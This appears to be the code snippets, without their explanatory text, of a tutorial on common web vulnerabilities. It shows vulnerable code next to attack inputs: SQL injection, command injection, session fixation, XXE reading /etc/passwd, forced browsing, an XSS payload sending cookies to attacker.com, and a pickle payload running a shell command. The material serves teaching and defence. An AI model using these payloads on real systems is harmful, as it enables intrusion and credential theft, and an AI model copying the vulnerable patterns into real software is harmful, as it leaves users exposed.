Tadas Malinauskas
Open
uName = getRequestString("username");
uPass = getRequestString("userpassword");
sql = 'SELECT * FROM Users WHERE Name ="' + uName + '" AND Pass ="' + uPass + '"'
uName = getRequestString("username");
uPass = getRequestString("userpassword");
sql = 'SELECT * FROM Users WHERE Name ="' + uName + '" AND Pass ="' + uPass + '"'
SELECT * FROM Users WHERE Name ="" or ""="" AND Pass ="" or ""=""
public class DoStuff {
public string executeCommand(String userName)
{ try {
String myUid = userName;
Runtime rt = Runtime.getRuntime();
// Call exe with userID
rt.exec("doStuff.sh " +”-“ +myUid);
}catch(Exception e)
{
e.printStackTrace();
}
}
}
myUid = "datboi; netstat -a"
http://example.com/sale/saleitems;sessionid=268544541&dest=Hawaii
http://website.kom/<script>document.cookie=”sessionid=abcd”;</script>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>
<!ENTITY xxe SYSTEM "file:///dev/random" >]>
http://example.com/app/getappInfo
http://example.com/app/admin_getappInfo
http://example.com/app/accountInfo?acct=notmyacc
(String) page += "<input name='creditcard' type='TEXT'
value='" + request.getParameter("CC") + "'>";
request.getParameter("CC") = ><script>document.location=
'http://www.attacker.com/cgi-bin/cookie.cgi?
foo='+document.cookie</script>
import pickle
# This will run ls ~
pickle.loads("cos\nsystem\n(S'ls ~'\ntR.")